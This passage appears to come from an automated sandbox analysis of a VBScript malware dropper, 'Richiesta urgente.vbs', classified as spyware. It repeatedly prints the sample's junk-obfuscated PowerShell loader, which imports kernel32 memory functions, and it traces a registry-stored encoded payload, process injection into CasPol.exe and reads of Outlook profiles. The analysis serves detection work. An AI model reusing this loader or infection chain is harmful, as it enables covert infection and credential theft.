UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
          Source: Initial file: Jibboom.ShellExecute Cystatrophia162, " " & chrw(34) & A5 & chrw(34), "", "", 0
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5465
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5465
          Source: Richiesta urgente.vbs, type: SAMPLEMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: amsi64_4088.amsi.csv, type: OTHERMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: Process Memory Space: powershell.exe PID: 5840, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_009A0040
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_009A8868
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_009A4968
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_009A7B90
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_009A8868
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00A40040
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00A40040
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_009A4958
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_0136BA76
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_1DA00B7D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_1DB3D832
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_1DB37E50
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_20220900
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_20220070
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_20222940
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_202208A0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_209E9CF8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_209E6050
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_209EBE98
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_209EC2D8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_209EA6EC
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_209E3FF0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_1D95AFDA NtQuerySystemInformation,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_1D95AFB8 NtQuerySystemInformation,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
          Source: Richiesta urgente.vbsInitial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP"
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_1D95AAB6 AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_1D95AA7F AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdv1nroa.nix.ps1Jump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@13/10@2/2
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_01
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:120:WilError_01
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs"
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
          Source: Binary string: fk8C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.pdb source: powershell.exe, 00000003.00000002.738843445.0000000004AE7000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Antar\Handlings\Detekteringernes", "cQGbcQGbuqdXJKrrAmx26wLrX4HqxXyk4nEBm+sC5jeB8kIefsfrApk4cQGb6wLc7XEBm+tP", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Skolegaardene = """ReABedSadDi-FiTGe", "", "", "0")
          Source: Yara matchFile source: 00000003.00000002.759722470.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.627203109.0000000001350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt 